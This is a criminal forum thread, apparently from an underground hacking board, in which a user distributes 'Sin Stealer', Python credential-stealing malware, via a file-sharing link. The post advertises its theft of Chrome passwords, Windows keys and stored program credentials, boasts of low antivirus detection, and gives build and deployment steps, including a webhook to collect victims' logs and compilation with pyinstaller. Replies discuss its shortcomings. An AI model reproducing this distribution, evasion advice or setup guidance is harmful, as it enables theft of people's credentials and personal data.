• XSS.stack #1 – первый литературный журнал от юзеров форума

malware Sin Stealer | 1/72 Virustotal | Full Source

Отслеживать
plexus

plexus

RAID-массив
Пользователь
Регистрация
15.08.2020
Сообщения
59
Реакции
62
Hello everyone, I wanted to share something instead of a lich. This has been leaked recently, however it has potential. This is the sin stealer he discards:
  • chrome passwords
  • user data
  • - windows key
  • Stored passwords for various programs
  • Uses dissonance
  • Pretty fast
  • 1/72 on virustotal even after it got leaked
It looks like it still gets past malwarebytes and other antivirus distributions. While this is python-based malware, which does mean you'll get big binaries, it is arguably a decent deal for low detections. To compile your own copy change the configuration in the sin.py file. Next, create a webhook that will act as your server to receive user logs. Compile it with pyinstaller or pyarmor by running 'pyinstaller sin.py --onefile`. Feel free to upload it to virustotal and test the detection yourself.
In the meantime, there is no need to know about it. "

Скрытый контент для зарегистрированных пользователей.
https://anonfiles.com/5bn2BcPfoc/Sin_zip
 
Последнее редактирование модератором:
Пожалуйста, обратите внимание, что пользователь заблокирован
plexus сказал(а):
This has been leaked recently, however it has potential
Ну как то очень бедненько. По сути дела только Chrome реализация, хотя это бы работало для всех браузеров на базе Chromium, если бы автор достал голову из жопы.

plexus сказал(а):
While this is python-based malware, which does mean you'll get big binaries
Серьезно? Это как это мы не получим большой бинарь, если этот кодец зависит от Openssl и охоспадипрости Qt? Магия какая-то.
 
DildoFagins сказал(а):
Ну как то очень бедненько. По сути дела только Chrome реализация, хотя это бы работало для всех браузеров на базе Chromium, если бы автор достал голову из жопы.


Серьезно? Это как это мы не получим большой бинарь, если этот кодец зависит от Openssl и охоспадипрости Qt? Магия какая-то.

да, реализация chrome далека от совершенства. Я в основном делился им, так как полагал, что это может быть интересно некоторым людям. Его также лучше использовать в качестве базы или места для начала. :P
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Its better use nirsoft tools in this case. Really, its poor for a stealer.
 
X4Crow сказал(а):
Its better use nirsoft tools in this case. Really, its poor for a stealer.
smh ? was just trying to share some source code I found and its a decent base and currently works with low detections. Ill make a modded version of it with more features and optimize the code when I get some free time.
 
Последнее редактирование модератором:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх